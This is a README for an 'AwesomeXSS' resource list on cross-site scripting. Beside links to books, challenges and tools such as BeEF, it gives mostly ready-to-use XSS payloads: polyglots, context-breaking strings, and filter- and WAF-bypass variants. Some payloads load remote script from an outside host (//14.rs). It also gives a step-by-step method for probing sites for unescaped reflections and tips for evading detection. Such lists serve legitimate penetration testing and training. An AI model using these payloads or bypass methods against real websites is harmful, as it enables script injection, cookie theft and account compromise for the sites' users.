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# AwesomeXSS
Awesome XSS stuff.
Put this repo on watch. I will be updating it regularly.
### Awesome Books
- [XSS Cheat Sheet By Brute Logic](https://leanpub.com/xss)
### Awesome Websites
- [brutelogic.com.br](http://brutelogic.com.br)
- [respectxss.blogspot.in](https://respectxss.blogspot.in/)
### Awesome Challenges
- [Google's XSS Challenge](https://xss-game.appspot.com/)
- [prompt(1) to win](http://prompt.ml/)
### Awesome People
- [Rodolfo Assis](https://twitter.com/brutelogic)
- [Ashar Javed](https://twitter.com/soaj1664ashar)
- [Somdev Sangwan](https://twitter.com/s0md3v) because I made this repo :3
### Awesome Reads & Presentations
- [XSS in Sarahah](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html)
- [Bypass Any WAF for XSS](https://teamultimate.in/bypass-waf-xss-easily/)
- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)
- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)
- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)
- [Copy Pest](https://www.slideshare.net/x00mario/copypest)
### Awesome Tools
- [XSStrike](http://xsstrike.tk/)
- [KNOXSS](http://knoxss.me/)
- [BeEF](https://github.com/beefproject/beef)
- [JShell](https://github.com/UltimateHackers/JShell)
### Awesome Payloads
<--`<img/src=` onerror=confirm``> --!>
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<details ontoggle=confirm()>
<svg onload=write()>
<script y="><">/*<script* */prompt()</script
Here's an interesting XSS polyglot by [Ahmed Elsobky](https://github.com/0xsobky/):
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
### Awesome Tags & Event Handlers
- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)
Some HTML Tags that you will be using
### Awesome Context Breaking
#### Simple Context
<svg onload=alert()>
</tag><svg onload=alert()>
#### Attribute Context
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
#### JavaScript Context
</script><svg onload=alert()>
### Awesome Confirm Variants
Yep, confirm because alert is too mainstream.
new class extends confirm``{}
### Awesome Exploits
A good compilation of advanced XSS exploits can be found [here](http://www.xss-payloads.com/payloads-list.html?a#category=all)
### Awesome Probing
If nothing of this works, take a look at **Awesome Bypassing** section
First of all, enter a non-malicious string like **d3v** and look at the source code to get an idea about number and contexts of refelections.
<br>Now for attribute context, check if double quotes (") are being filtered by entering **x"d3v**. If it gets altered to **x&quot;d3v**, chances are that proper security measures are in place. If this happens, try doing the same for single quotes (') by entering **x'd3v**, if it gets altered to **x&apos;**, you are doomed. The only thing you can try is encoding.<br>
If the quotes are not being filtered, you can simply try payloads from **Awesome Context Breaking** section.
<br>For javascript context, check which quotes are being used for example if they are doing
variable = 'value' or variable = "value"
Now lets say single quotes (') are in use, in that case enter **x'd3v**. If it gets altered to **x\\'d3v**, try escaping the backslash (\) by adding a backslash to your probe i.e. **x\\'d3v**. If it works use the following payload:
But if it gets altered to **x\\'d3v**, the only thing you can try is closing the script tag itself by using
</script><svg onload=alert()>
For simple HTML context, the probe is **x>d3v**. If it gets altered to **x&gt;d3v**, proper sanitization is in place. If it gets reflected as it as, you can enter a dummy tag to check for potenial filters. The dummy tag I like to use is **x<xxx>**. If it gets stripped or altered in any way, it means the filter is looking for a pair of **<** and **>**. It can simply bypassed using
<svg onload=alert()//
or this (it will not work in all cases)
<svg onload=alert()
If the your dummy tags lands in the source code as it is, go for any of these payloads
<svg onload=alert()>
<embed src=//14.rs>
<details open ontoggle=alert()>
### Awesome Bypassing
**Note:** None of these payloads use single (') or double quotes (").
- Without event handlers
<object data=javascript:confirm()>
<script src=//14.rs>
- Without space
- Without slash (/)
<svg onload=confirm()>
<img src=x onerror=confirm()>
- Without equal sign (=)
- Without closing angular bracket (>)
<svg onload=confirm()//
- Without alert, confirm, prompt
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
- Without a Valid HTML tag
<x onclick=confirm()>click here
### Awesome Encoding
Come back later
### Awesome Tips & Tricks
- http(s):// can be shortened to // or /\\.
- **document.cookie** can be shortened to **cookie**. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing **alert('XSS')** and start doing **alert()**
- You can use **//** to close a tag instead of **>**.
- I have found that **confirm** is the least detected pop-up function so stop using **alert**.
- Quotes around attribute value aren't neccessary as long as it doesn't contain spaces. You can use **<script src=//14.rs>** instead of **<script src="//14.rs">**
- The shortest independent "XSS" payload is **<embed src=//14.rs>** (19 chars)
### Awesome Credits
All the payloads are crafted by me unless specified.
Thanks to my big brother [Rodolfo Assis](https://twitter.com/brutelogic) whose writings inspired me to become an XSSLord.